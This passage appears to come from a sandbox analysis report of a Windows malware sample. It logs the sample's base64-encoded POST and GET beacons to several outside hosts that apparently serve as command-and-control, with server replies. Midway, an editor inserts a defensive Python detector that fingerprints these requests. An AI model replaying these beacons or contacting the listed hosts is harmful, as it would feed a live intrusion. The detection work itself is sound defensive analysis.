                                                                                                                   POST /jqkr/ HTTP/1.1
                                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                  Accept-Language: en-US
                                                                                                                  Accept-Encoding: gzip, deflate
                                                                                                                  Host: www.lurknlarkk.xyz
                                                                                                                  Origin: http://www.lurknlarkk.xyz
                                                                                                                  Connection: close
                                                                                                                  Cache-Control: max-age=0
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  Content-Length: 1239
                                                                                                                  Referer: http://www.lurknlarkk.xyz/jqkr/
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko)
                                                                                                                  Data Raw: 6e 56 3d 75 2f 56 53 47 2f 74 7a 70 32 43 34 4d 78 34 4b 62 63 61 78 6b 62 6c 57 75 6b 61 30 62 30 49 45 79 4d 76 53 42 75 4f 67 55 64 74 67 61 2b 36 39 61 39 57 42 78 75 39 45 31 45 56 53 30 49 42 4c 73 30 46 7a 43 6f 76 53 64 4b 56 58 2b 65 69 36 64 7a 62 47 78 76 73 47 72 45 77 4b 73 47 66 66 6f 38 47 30 4b 63 51 45 79 75 74 32 2b 33 65 70 65 6f 37 6e 54 34 42 6e 64 74 35 73 52 49 48 64 6b 50 35 68 48 71 54 63 67 76 56 53 5a 42 65 37 43 39 53 4e 45 4c 68 4f 6e 4f 71 58 63 54 51 74 6b 74 4f 6e 68 6c 44 33 6b 2b 31 61 71 78 48 62 44 79 6d 46 33 4f 2f 6c 50 45 7a 77 73 52 68 79 36 36 5a 67 41 76 4b 46 62 7a 46 6f 69 44 74 79 55 42 44 71 69 41 66 77 30 57 4a 6c 78 77 4a 58 62 79 75 43 43 45 71 57 4d 4d 79 6c 76 42 72 6e 6b 51 6e 48 38 32 61 33 6c 41 44 49 4b 63 50 2f 34 4a 59 74 57 4c 4c 57 62 43 57 63 52 44 52 7a 33 35 71 31 52 4d 34 6a 4b 31 50 39 62 76 68 4e 4c 67 6d 55 70 31 50 66 2b 7a 76 67 63 6c 53 2f 65 65 36 52 74 5a 69 53 53 34 48 6e 39 4f 65 4a 57 4a 37 2b 54 34 54 75 77 39 35 39 74 44 78 [TRUNCATED]
                                                                                                                  Data Ascii: nV=u/VSG/tzp2C4Mx4KbcaxkblWuka0b0IEyMvSBuOgUdtga+69a9WBxu9E1EVS0IBLs0FzCovSdKVX+ei6dzbGxvsGrEwKsGffo8G0KcQEyut2+3epeo7nT4Bndt5sRIHdkP5hHqTcgvVSZBe7C9SNELhOnOqXcTQtktOnhlD3k+1aqxHbDymF3O/lPEzwsRhy66ZgAvKFbzFoiDtyUBDqiAfw0WJlxwJXbyuCCEqWMMylvBrnkQnH82a3lADIKcP/4JYtWLLWbCWcRDRz35q1RM4jK1P9bvhNLgmUp1Pf+zvgclS/ee6RtZiSS4Hn9OeJWJ7+T4Tuw959tDxvhL3s4do2RqGqBFtlNzq+ABsSTdfmsbZhkfoGHFCwvNu2F76fCfFJfTXSy6FvQuJJqMJorWrLW+cqPGnOudvQI+F4IP6+BjTpqx7VGQfzlaVIY3jPLvsGUXQunAVT0omWywKkaQLTPRQmFo25cw1/3+mgTf3N9FBoCJDP6Yev5iXbq3jEseIFS7HQSJGkiRTRSPEYrPKJZ1OjEt9z+DARweyfJdlkcFkgY8XUxhycPTgRb49wEdU2fqnA1NyO/6lCld1Z1jKSduoVsXtvpu/SjPT6eLTCjXkv7ja8uOtlRXz0+n3KAHCAURGvboOnJIINH3+B+dnH6KyLFCJjTeOCbCt708fnhE8Ars6qHim0aOVz7gg5gQ/2UDKaidg7eo0N314L8u/43stbeveL5DAEwtHhepAlsjLAcJlP46WRSK53758ZFjwq4a+waN9e9QxD5tumfjH7n8MeFO73UVbY2DYbWU05CPEEuXqpPCPxNaVNcetgL8PKfRnFK0S9KtJPlcDHlKxImxzkQHYXAYL8zHPoFrL7sKw7EdCmcTnLla2H/7ZRu4vklPRpPujui79pSU6zZdJ5iSjrHGkfASZcFKtWlmbQJWV/ikJ5JRFe8G0CDgnRFV/2zeLNBrgISj/KZIYHBTSSfO29Md9cQvCXZNdM5j4XoGWdA [TRUNCATED]
                                                                                                                   Timestamp: Oct 8, 2024 15:40:29.819581985 CEST | Bytes transferred: 195 | Direction: IN | Data:
                                                                                                                   HTTP/1.1 404 Not Found
                                                                                                                  Content-Type: text/plain; charset=utf-8
                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                  Date: Tue, 08 Oct 2024 13:40:29 GMT
                                                                                                                  Content-Length: 19
                                                                                                                  Connection: close
                                                                                                                  Data Raw: 34 30 34 20 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 0a
                                                                                                                  Data Ascii: 404 page not found


                                                                                                                   Session ID: 40 | Source IP: 192.168.2.5 | Source Port: 50015 | Destination IP: 172.191.244.62 | Destination Port: 80 | PID: 4568 | Process: C:\Program Files (x86)\qMMscfYOaJVsvvwoxWKNjVjKgsZGdwzfiNkZOTOmcvHeNyaGgZTijVCYOWGYEWnlX\avmjQSNkeFbUoa.exe
                                                                                                                   Timestamp: Oct 8, 2024 15:40:31.927400112 CEST | Bytes transferred: 472 | Direction: OUT | Data:
                                                                                                                   GET /jqkr/?nV=j99yFPFWu1ukFCAkcsa1pdNTyzikS1cIw9CibMKFTP9vYaGLd9Ca8ZMxvCgy8ZIQlD5WNv+rF4xM8fWyLzqu8NEu/AkJhGyL6Y/IOsxIi9hhzm6Wfo2GHcU4TuRzIqeNlQ==&ntHx=DVDDWR70P4Ux HTTP/1.1
                                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                  Accept-Language: en-US
                                                                                                                  Host: www.lurknlarkk.xyz
                                                                                                                  Connection: close
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko)
                                                                                                                   Timestamp: Oct 8, 2024 15:40:32.437335968 CEST | Bytes transferred: 195 | Direction: IN | Data:
                                                                                                                   HTTP/1.1 404 Not Found
                                                                                                                  Content-Type: text/plain; charset=utf-8
                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                  Date: Tue, 08 Oct 2024 13:40:32 GMT
                                                                                                                  Content-Length: 19
                                                                                                                  Connection: close
                                                                                                                  Data Raw: 34 30 34 20 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 0a
                                                                                                                  Data Ascii: 404 page not found


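The requests in the sessions above share a shape that a detection engineer can key on independently of the hosts involved: a User-Agent that claims Windows NT 5.1 and carries no Chrome or Safari product token, a four-character directory path, `Connection: close` on every request, GET requests with one long base64 parameter (`nV`) plus a 12-character token (`ntHx`), and POST requests with a single base64 form field whose Origin and Referer point back at the same plain-HTTP host. The sample cycles through several hosts, one answering with a JavaScript redirect and the rest with 404, so a host block list alone is a weak control; the request shape is the durable signal. The following Python is an added example written for this page; it is neither Joe Sandbox output nor code from the sample. The two malicious requests are abridged copies of sessions 36 and 37 above, the benign control request is constructed, and the trait list, the threshold of three traits, and the assumption that parameter names and paths change between builds are the editor's own.

```python
import re

# Hard-coded User-Agent seen on every request in this report: it names an XP-era
# Windows build and stops after the WebKit token, which no current browser does.
UA_SEEN = "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko)"

# Constructed samples: abridged copies of sessions 36 and 37 plus a benign control.
SAMPLE_GET = (
    "GET /u6k6/?nV=dY5LfBxT8+4OTYgXKtZbNifUsoDX+uWzLeRRn9zdsxFld7n68myH2Gd2W2FS03HPt+W/"
    "9NATFibZyiY45uryUTVD4Y8PctWQGLDO40gge8F8TAbPjM2Na57q5AxIn0qb9A==&ntHx=DVDDWR70P4Ux HTTP/1.1\r\n"
    "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"
    "Accept-Language: en-US\r\n"
    "Host: www.healthyloveforall.net\r\n"
    "Connection: close\r\n"
    f"User-Agent: {UA_SEEN}\r\n\r\n"
)
SAMPLE_POST = (
    "POST /jqkr/ HTTP/1.1\r\n"
    "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"
    "Accept-Language: en-US\r\n"
    "Accept-Encoding: gzip, deflate\r\n"
    "Host: www.lurknlarkk.xyz\r\n"
    "Origin: http://www.lurknlarkk.xyz\r\n"
    "Connection: close\r\n"
    "Cache-Control: max-age=0\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n"
    "Content-Length: 203\r\n"
    "Referer: http://www.lurknlarkk.xyz/jqkr/\r\n"
    f"User-Agent: {UA_SEEN}\r\n\r\n"
    "nV=u/VSG/tzp2C4KQoKd/yxsblZyUa0VUIIyMjSBruwUvhgaJW9abiBzu9E3EVW5oBns0R/CqmwdIZX/5O6JBzH5/"
    "sE90wJsGeFo8W4KclfyuF2+FGpZY7mfYBndt4+RIHxkPxPHuH2hZ5SYkS7EcSKGLhCvur4SwJ3ieW7p0bwxdBTsAToLTWkgtTDRgCntXQHi/RFe58="
)
BENIGN_GET = (
    "GET /search?q=weather&hl=en HTTP/1.1\r\n"
    "Host: www.example.com\r\n"
    "Connection: keep-alive\r\n"
    "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) "
    "Chrome/129.0.0.0 Safari/537.36\r\n\r\n"
)

# A base64 blob long enough to be an encrypted beacon rather than a short token.
B64_VALUE = re.compile(r"[A-Za-z0-9+/]{40,}={0,2}")


def parse_request(raw):
    """Split a raw HTTP/1.1 request into (method, path, query, headers, body)."""
    head, _, body = raw.partition("\r\n\r\n")
    request_line, *header_lines = head.split("\r\n")
    method, target, _version = request_line.split(" ", 2)
    path, _, query = target.partition("?")
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, path, query, headers, body


def split_form(data):
    """Split urlencoded data into (key, value) pairs without decoding '+', which base64 uses."""
    return [tuple(part.split("=", 1)) for part in data.split("&") if "=" in part]


def score_request(raw):
    """Return (flagged, reasons); flagged when at least three traits line up (editor's threshold)."""
    method, path, query, headers, body = parse_request(raw)
    reasons = []
    if headers.get("user-agent") == UA_SEEN:
        reasons.append("truncated XP-era User-Agent with no browser product token")
    # Assumption: the four-character directory (u6k6, jqkr, hya5 here) varies per build.
    if re.fullmatch(r"/[a-z0-9]{4}/", path):
        reasons.append("four-character directory path")
    if headers.get("connection", "").lower() == "close":
        reasons.append("Connection: close on a browser-looking request")
    if method == "GET":
        pairs = split_form(query)
        if (len(pairs) == 2 and B64_VALUE.fullmatch(pairs[0][1])
                and re.fullmatch(r"[A-Za-z0-9]{12}", pairs[1][1])):
            reasons.append("GET with one base64 blob plus a 12-character token")
    elif method == "POST":
        pairs = split_form(body)
        host = headers.get("host", "")
        if (headers.get("content-type") == "application/x-www-form-urlencoded"
                and len(pairs) == 1 and B64_VALUE.fullmatch(pairs[0][1])):
            reasons.append("POST of a single base64 form field")
        if (headers.get("origin") == f"http://{host}"
                and headers.get("referer") == f"http://{host}{path}"):
            reasons.append("self-referential Origin and Referer over plain HTTP")
    return len(reasons) >= 3, reasons


if __name__ == "__main__":
    for name, sample in (("GET", SAMPLE_GET), ("POST", SAMPLE_POST), ("benign", BENIGN_GET)):
        flagged, reasons = score_request(sample)
        print(name, flagged, reasons)
```

`score_request` returns the list of traits that fired so an analyst can see why a request scored, and the threshold is deliberately above any single trait: `Connection: close` and short paths both occur in legitimate traffic, and the User-Agent string alone is trivial for a later build to change. Tune the threshold against a corpus of real browser traffic before deploying it as an alert.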
                                                                                                                   Session ID: 41 | Source IP: 192.168.2.5 | Source Port: 50016 | Destination IP: 162.241.244.106 | Destination Port: 80 | PID: 4568 | Process: C:\Program Files (x86)\qMMscfYOaJVsvvwoxWKNjVjKgsZGdwzfiNkZOTOmcvHeNyaGgZTijVCYOWGYEWnlX\avmjQSNkeFbUoa.exe
                                                                                                                   Timestamp: Oct 8, 2024 15:40:37.511646032 CEST | Bytes transferred: 727 | Direction: OUT | Data:
                                                                                                                   POST /hya5/ HTTP/1.1
                                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                  Accept-Language: en-US
                                                                                                                  Accept-Encoding: gzip, deflate
                                                                                                                  Host: www.mommymode.site
                                                                                                                  Origin: http://www.mommymode.site
                                                                                                                  Connection: close
                                                                                                                  Cache-Control: max-age=0
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  Content-Length: 203
                                                                                                                  Referer: http://www.mommymode.site/hya5/
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko)
                                                                                                                  Data Raw: 6e 56 3d 70 44 67 47 65 44 73 38 59 6c 37 6e 48 43 32 6a 65 59 30 52 44 5a 59 42 6f 2b 64 36 4b 53 30 72 43 58 77 45 30 75 6a 59 50 6b 72 4c 54 70 47 73 5a 4e 30 72 33 5a 31 4f 68 4a 75 6a 4a 35 62 44 2b 73 32 2f 43 65 64 68 55 48 6b 6f 59 58 56 32 71 44 33 64 62 6e 69 42 5a 6c 36 65 53 49 59 61 51 65 62 77 70 66 36 61 78 74 64 6b 5a 7a 2b 31 68 75 34 74 71 73 55 65 77 52 62 4e 39 34 4d 31 45 39 2b 58 50 61 67 6a 5a 51 6c 55 71 77 32 53 76 38 78 39 53 47 6a 52 70 66 7a 38 39 35 45 51 35 61 76 39 43 2b 53 4d 31 64 4a 35 31 76 49 30 58 69 4f 43 4b 41 4d 5a 32 31 6a 53 37 75 58 34 42 4c 43 35 61 78 63 3d
                                                                                                                  Data Ascii: nV=pDgGeDs8Yl7nHC2jeY0RDZYBo+d6KS0rCXwE0ujYPkrLTpGsZN0r3Z1OhJujJ5bD+s2/CedhUHkoYXV2qD3dbniBZl6eSIYaQebwpf6axtdkZz+1hu4tqsUewRbN94M1E9+XPagjZQlUqw2Sv8x9SGjRpfz895EQ5av9C+SM1dJ51vI0XiOCKAMZ21jS7uX4BLC5axc=
                                                                                                                   Timestamp: Oct 8, 2024 15:40:38.306790113 CEST | Bytes transferred: 1236 | Direction: IN | Data:
                                                                                                                   HTTP/1.1 404 Not Found
                                                                                                                  Date: Tue, 08 Oct 2024 13:40:38 GMT
                                                                                                                  Server: Apache
                                                                                                                  Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                  Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                                                  Link: <https://mommymode.site/wp-json/>; rel="https://api.w.org/"
                                                                                                                  Upgrade: h2,h2c
                                                                                                                  Connection: Upgrade
                                                                                                                  Vary: Accept-Encoding
                                                                                                                  Content-Encoding: gzip
                                                                                                                  host-header: c2hhcmVkLmJsdWVob3N0LmNvbQ==
                                                                                                                  X-Newfold-Cache-Level: 2
                                                                                                                  X-Endurance-Cache-Level: 2
                                                                                                                  X-nginx-cache: WordPress
                                                                                                                  Content-Length: 12947
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Data Raw: 1f 8b 08 00 00 00 00 00 00 03 cd b2 eb 72 e3 c6 92 2d fc db 7a 8a 6a 76 d8 22 6d 16 78 a7 24 48 94 67 b6 2f e7 78 62 7b db e1 b6 67 62 c2 ed e8 28 02 09 a0 5a 85 2a ec aa 02 29 36 47 bf ce 53 9c 5f e7 15 bf 47 f8 b2 00 90 a2 28 50 54 eb ba db 16 01 54 65 ae 5c b9 d6 3a 7b f3 fd 2f df fd fe df bf fe 40 12 9b 8a f3 83 33 f7 20 82 c9 78 d2 00 49 ff 78 d7 70 67 c0 c2 f3 83 2f ce 52 b0 8c 04 09 d3 06 ec a4 f1 c7 ef 3f d2 e3 06 e9 ac 6f 24 4b 61 d2 98 71 98 67 4a db 06 09 94 b4 20 b1 72 ce 43 9b 4c 42 98 f1 00 68 f1 d1 26 5c 72 cb 99 a0 26 60 02 26 bd 02 67 03 e6 50 ab a9 b2 e6 70 0d 72 98 b2 4b ca 53 16 03 cd 34 b8 21 be 60 3a 86 c3 a2 d1 72 2b e0 fc 57 bc 25 52 59 12 a9 5c 86 e4 ab b7 c7 fd 5e ef 94 fc 4d 09 fc 60 69 76 4a 7e d5 60 ed 82 fc c2 0c 37 67 9d b2 eb e0 4c 70 79 41 34 88 c9 61 28 8d 83 8f c0 06 c9 21 49 f0 6d 72 d8 e9 a4 2a 4d 17 a9 0a c1 33 dc 56 13 d7 3d 0d 26 2c 68 c9 2c 34 88 5d 64 a8 00 cb 32 c1 03 66 b9 92 1d 6d cc 37 97 a9 c0 2b 37 6b d2 d8 c1 85 7c a5 d9 3f 73 75 4a 7e 04 08 1b e5 e0 [TRUNCATED]
                                                                                                                  Data Ascii: r-zjv"mx$Hg/xb{gb(Z*)6GS_G(PTTe\:{/@3 xIxpg/R?o$KaqgJ rCLBh&\r&`&gPprKS4!`:r+W%RY\^M`ivJ~`7gLpyA4a(!Imr*M3V=&,h,4]d2fm7+7k|?suJ~FbmfK:$D}U&-h9{#ecEww7w{S4F^/;v.-{acJ@|s*4e3Jm~SyFDQMqP4Qp_/ho\]t~C~OP dU4(1MTtuN&V/;;Y<)~S|-oDDcUpj_7-B)Z8Q/Uofm73N&8-<dbyuZ.X]kh#'g#rgB,l
                                                                                                                   Timestamp: Oct 8, 2024 15:40:38.306807995 CEST | Bytes transferred: 1236 | Direction: IN | Data Raw: 08 4e b2 e0 d4 7e 2a 36 ad 53 0d 36 d7 92 58 0f 30 04 8b e6 da 57 94 af b5 ac 2e 61 32 99 e8 3f ed 5f 57 ad 6b 81 f3 95 c0 66 ce 9d fc 58 1d 60 a2 1a 91 60 71 c3 af 1a 1d 4c e3 7d 1e 1e 0f 02 fc 8d a2 c1 fb 3c 82 6e f4 3e ef 77 bb 21 fe 8e d9 51
                                                                                                                  Data Ascii: N~*6S6X0W.a2?_WkfX``qL}<n>w!QyY6QMs6}Ul6!N]G;mm2\(:::88uZXWllx7m\MUv=Z>cI#!D\Bx3TDKK)W_X&o]"
                                                                                                                   Timestamp: Oct 8, 2024 15:40:38.306821108 CEST | Bytes transferred: 1236 | Direction: IN | Data Raw: 4d 55 08 7f 55 8e ac ee 30 94 96 07 4c 50 a1 ff 6a b5 6f e3 68 1e 27 9f 07 a4 85 03 ea 3f 11 a1 5b 38 0f 25 34 78 22 42 b7 70 1e 4a 68 f8 44 84 6e e1 3c 94 d0 e8 89 08 dd c2 79 28 a1 f1 13 11 ba 85 f3 30 42 4b ad 2c b3 e0 f7 8e bb 21 c4 57 07 67
                                                                                                                  Data Ascii: MUU0LPjoh'?[8%4x"BpJhDn<y(0BK,!WgxN\ik%K%jR&DAg)iF^{q.Uxe6ou!*|lTqm,k-e$BZ}m]~=-vMoo||".};.^X
                                                                                                                   Timestamp: Oct 8, 2024 15:40:38.306865931 CEST | Bytes transferred: 1236 | Direction: IN | Data Raw: c4 da cc ef 74 52 95 a6 8b 54 85 e0 e1 a6 d0 41 7e 28 80 c5 ac 77 8a 2d 4c 67 03 b6 c3 8c 01 6b 3a 88 d2 d9 31 c1 4b b9 f4 f0 fe db 19 e8 49 cf eb 7a dd 43 92 42 c8 d9 e4 90 09 71 48 3a db ba 41 aa 3e 72 5a ee 72 53 b2 83 2f 78 1a 3b c1 4c ca 05
                                                                                                                  Data Ascii: tRTA~(w-Lgk:1KIzCBqH:A>rZrS/x;L,}dy!7Ziem<"U$a^'eIy3M.Rc.}%kv)eq'O5,jRb!U5PBim{Li5:v?lB/0OYoo{
                                                                                                                   Timestamp: Oct 8, 2024 15:40:38.306876898 CEST | Bytes transferred: 1236 | Direction: IN | Data Raw: 76 37 bb 6c 5d fd 5b 0a 21 67 c4 04 1a 40 12 26 43 d2 bc a6 3b ee ba 9a e5 53 51 42 b0 ab ab 83 b3 4e 21 e5 f9 c1 99 e0 f2 82 68 10 93 c3 e2 c4 24 00 f6 90 f0 70 72 28 a3 90 ce 95 2c ec 13 2a b8 30 34 b7 5c 20 18 18 1a 18 73 48 12 0d d1 e4 30 b1
                                                                                                                  Data Ascii: v7l][!g@&C;SQBN!h$pr(,*04\ sH06;T"U!x8:%PLLE2,:i0DqHGJTq4`'"xIzCRh99dB.Xw!.Q(:?p&Y:,@||upJQ@;4S/|
                                                                                                                  Oct 8, 2024 15:40:38.306883097 CEST1236INData Raw: 76 73 de b2 61 b7 3b 1c d6 e2 47 0a b1 0d ff 04 94 9a 94 09 e1 93 40 b0 34 6b f6 34 20 88 fb 25 df 90 66 b3 37 9b 13 4a ba 5e 1f 0f 5a e4 6b 7c eb 1e 8f 5b 58 80 4f 77 b4 1b 35 85 90 e7 e9 1a d6 1b 94 c0 c5 73 07 74 bf 57 42 8f ee 46 16 4c c7 b0
                                                                                                                  Data Ascii: vsa;G@4k4 %f7J^Zk|[XOw5stWBFLV;Ghh7hC>JwzVWwK.b21JMk)^oE?>:F.\,0yc3BY>t_wnXF7IW_.1HIcKc2B,
                                                                                                                  Oct 8, 2024 15:40:38.306894064 CEST1236INData Raw: 9f 05 3f 6b 1c c6 ce 58 cd b8 84 f0 b1 ab 6f 43 3d 54 81 2d 9c 17 12 22 12 70 d9 5a de 3b 45 3b 71 62 cd c3 cf c1 d9 b2 1e 17 f6 98 e0 b1 14 10 d9 25 9e 30 5c d6 bd af b6 e1 52 a0 32 d7 76 dc 3c 2e b6 ec 43 ba 1b 57 f3 38 59 03 17 1f f5 c8 0e a4
                                                                                                                  Data Ascii: ?kXoC=T-"pZ;E;qb%0\R2v<.CW8Y9iAr}rfJ[&oS?4uS*TyVk<r!Z-sI<fb]4jqu,3ZD^\aEjK\dZv?tY{ZLBj|RuM6UX
                                                                                                                  Oct 8, 2024 15:40:38.307131052 CEST1000INData Raw: a5 53 04 7f 82 81 05 50 dd 3c 1e 27 16 43 00 20 ab 58 3c 64 d6 16 c8 4e 8f 1e 39 67 1b 64 57 ca 56 f9 7e 98 55 37 21 76 ee f2 b8 21 5b 18 3b a7 64 b9 ce c4 63 46 94 00 35 f8 53 66 1e 86 eb 1a 6b f0 02 25 ad 66 c6 3e 08 73 d5 5c e7 a8 e6 29 d3 8b
                                                                                                                  Data Ascii: SP<'C X<dN9gdWV~U7!v![;dcF5Sfk%f>s\)YYCq5^5&V4II('YnL)q9i`NE(u&`~]F8 uc(g@<R+X:uQJ3?Nih
                                                                                                                  Oct 8, 2024 15:40:38.307199001 CEST1236INData Raw: 49 7f 80 3f bd 61 d5 53 1f ac e2 46 65 d7 d0 95 aa eb c1 9f 30 49 21 5c 22 64 d7 fd 2b 95 bc 0e a3 93 12 43 22 26 87 c5 89 49 00 ec 61 19 4e a5 02 95 a6 a0 03 a0 b8 b0 ca 6d 11 46 92 68 88 26 87 89 b5 99 df e9 a4 58 b1 48 55 08 1e ba 0d 1d 0c 74
                                                                                                                  Data Ascii: I?aSFe0I!\"d+C"&IaNmFh&XHUtbL093F[xCBqH:fjPJQEnYI ea2$]qvbxuFPM Rz>[MG( )/jN<,>_8%Wgb"-
                                                                                                                  Oct 8, 2024 15:40:38.307209969 CEST1236INData Raw: 97 30 19 33 f2 8b 84 c6 9e a5 86 2f b0 54 50 b0 a1 4a 02 2e 76 5c 2d a6 21 ce 05 d3 4f b7 1c b7 4c f0 e0 5f 63 b9 92 cb 03 76 7b a7 72 1d 00 79 c7 a4 21 bf 6a b5 cf bd fe 8b 44 d2 51 a2 06 29 d1 4c 2b 3a eb f7 aa 2d fb 0f ca e6 5d 2b d6 78 f8 ea
                                                                                                                  Data Ascii: 03/TPJ.v\-!OL_cv{ry!jDQ)L+:-]+x+W]t^/Uu|)3%N~#_}U=z/_}U=y/_}z3hpcvL7[-8xVuW{8L?wzg5uW{N^oguW{w,
                                                                                                                  Oct 8, 2024 15:40:38.311754942 CEST1236INData Raw: 6b f1 7e 7e f0 85 fb 77 96 31 9b 10 14 e3 e7 de 80 8c 02 3a f0 06 a4 4b c7 a4 ef 1d e1 ef 18 51 7a de d0 1b b9 6f 7c 1b 90 81 77 24 b0 e8 98 b8 bf 9e d7 2b fe f0 dd 9d 05 3d 82 87 7d ac aa 2a ab 27 22 92 31 75 08 63 3a 7e d7 1b e3 c1 88 b8 71 9f
                                                                                                                  Data Ascii: k~~w1:KQzo|w$+=}*'"1uc:~qRz8#~x#)HIq{;uP<)b/U){nv(=Kx4Y'e|5Myffrt"Kk4*Tq_3W*Pi:*h:mry


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
42 | 192.168.2.5 | 50017 | 162.241.244.106 | 80 | 4568 | C:\Program Files (x86)\qMMscfYOaJVsvvwoxWKNjVjKgsZGdwzfiNkZOTOmcvHeNyaGgZTijVCYOWGYEWnlX\avmjQSNkeFbUoa.exe
Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 15:40:40.057022095 CEST | 747 | OUT | POST /hya5/ HTTP/1.1
                                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                  Accept-Language: en-US
                                                                                                                  Accept-Encoding: gzip, deflate
                                                                                                                  Host: www.mommymode.site
                                                                                                                  Origin: http://www.mommymode.site
                                                                                                                  Connection: close
                                                                                                                  Cache-Control: max-age=0
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  Content-Length: 223
                                                                                                                  Referer: http://www.mommymode.site/hya5/
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko)
                                                                                                                  Data Raw: 6e 56 3d 70 44 67 47 65 44 73 38 59 6c 37 6e 47 69 47 6a 64 37 63 52 49 5a 59 43 6b 65 64 36 45 79 30 76 43 58 38 45 30 71 37 32 50 58 50 4c 53 4d 69 73 65 4d 30 72 79 5a 31 4f 31 35 75 6d 45 5a 61 75 2b 73 71 33 43 66 78 68 55 48 77 6f 59 56 64 32 71 55 6a 63 61 33 69 66 4d 31 36 63 57 49 59 61 51 65 62 77 70 66 75 77 78 74 56 6b 5a 6a 4f 31 69 4c 4d 71 30 38 55 66 6d 42 62 4e 35 34 4d 78 45 39 2f 77 50 62 39 4f 5a 53 64 55 71 30 79 53 76 4f 5a 2b 63 47 69 61 6d 2f 7a 72 74 72 35 72 67 4a 75 78 4f 63 36 4f 72 38 31 42 77 5a 6c 65 4e 41 47 71 5a 67 67 68 6d 6d 72 6c 71 65 32 52 62 6f 53 4a 45 6d 4b 57 31 75 6d 47 51 74 52 78 68 37 75 57 59 37 63 62 75 74 2b 52
                                                                                                                  Data Ascii: nV=pDgGeDs8Yl7nGiGjd7cRIZYCked6Ey0vCX8E0q72PXPLSMiseM0ryZ1O15umEZau+sq3CfxhUHwoYVd2qUjca3ifM16cWIYaQebwpfuwxtVkZjO1iLMq08UfmBbN54MxE9/wPb9OZSdUq0ySvOZ+cGiam/zrtr5rgJuxOc6Or81BwZleNAGqZgghmmrlqe2RboSJEmKW1umGQtRxh7uWY7cbut+R
Oct 8, 2024 15:40:40.828442097 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                                                                                                  Date: Tue, 08 Oct 2024 13:40:40 GMT
                                                                                                                  Server: Apache
                                                                                                                  Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                  Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                                                  Link: <https://mommymode.site/wp-json/>; rel="https://api.w.org/"
                                                                                                                  Upgrade: h2,h2c
                                                                                                                  Connection: Upgrade
                                                                                                                  Vary: Accept-Encoding
                                                                                                                  Content-Encoding: gzip
                                                                                                                  host-header: c2hhcmVkLmJsdWVob3N0LmNvbQ==
                                                                                                                  X-Newfold-Cache-Level: 2
                                                                                                                  X-Endurance-Cache-Level: 2
                                                                                                                  X-nginx-cache: WordPress
                                                                                                                  Content-Length: 12947
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Data Raw: 1f 8b 08 00 00 00 00 00 00 03 cd b2 eb 72 e3 c6 92 2d fc db 7a 8a 6a 76 d8 22 6d 16 78 a7 24 48 94 67 b6 2f e7 78 62 7b db e1 b6 67 62 c2 ed e8 28 02 09 a0 5a 85 2a ec aa 02 29 36 47 bf ce 53 9c 5f e7 15 bf 47 f8 b2 00 90 a2 28 50 54 eb ba db 16 01 54 65 ae 5c b9 d6 3a 7b f3 fd 2f df fd fe df bf fe 40 12 9b 8a f3 83 33 f7 20 82 c9 78 d2 00 49 ff 78 d7 70 67 c0 c2 f3 83 2f ce 52 b0 8c 04 09 d3 06 ec a4 f1 c7 ef 3f d2 e3 06 e9 ac 6f 24 4b 61 d2 98 71 98 67 4a db 06 09 94 b4 20 b1 72 ce 43 9b 4c 42 98 f1 00 68 f1 d1 26 5c 72 cb 99 a0 26 60 02 26 bd 02 67 03 e6 50 ab a9 b2 e6 70 0d 72 98 b2 4b ca 53 16 03 cd 34 b8 21 be 60 3a 86 c3 a2 d1 72 2b e0 fc 57 bc 25 52 59 12 a9 5c 86 e4 ab b7 c7 fd 5e ef 94 fc 4d 09 fc 60 69 76 4a 7e d5 60 ed 82 fc c2 0c 37 67 9d b2 eb e0 4c 70 79 41 34 88 c9 61 28 8d 83 8f c0 06 c9 21 49 f0 6d 72 d8 e9 a4 2a 4d 17 a9 0a c1 33 dc 56 13 d7 3d 0d 26 2c 68 c9 2c 34 88 5d 64 a8 00 cb 32 c1 03 66 b9 92 1d 6d cc 37 97 a9 c0 2b 37 6b d2 d8 c1 85 7c a5 d9 3f 73 75 4a 7e 04 08 1b e5 e0 [TRUNCATED]
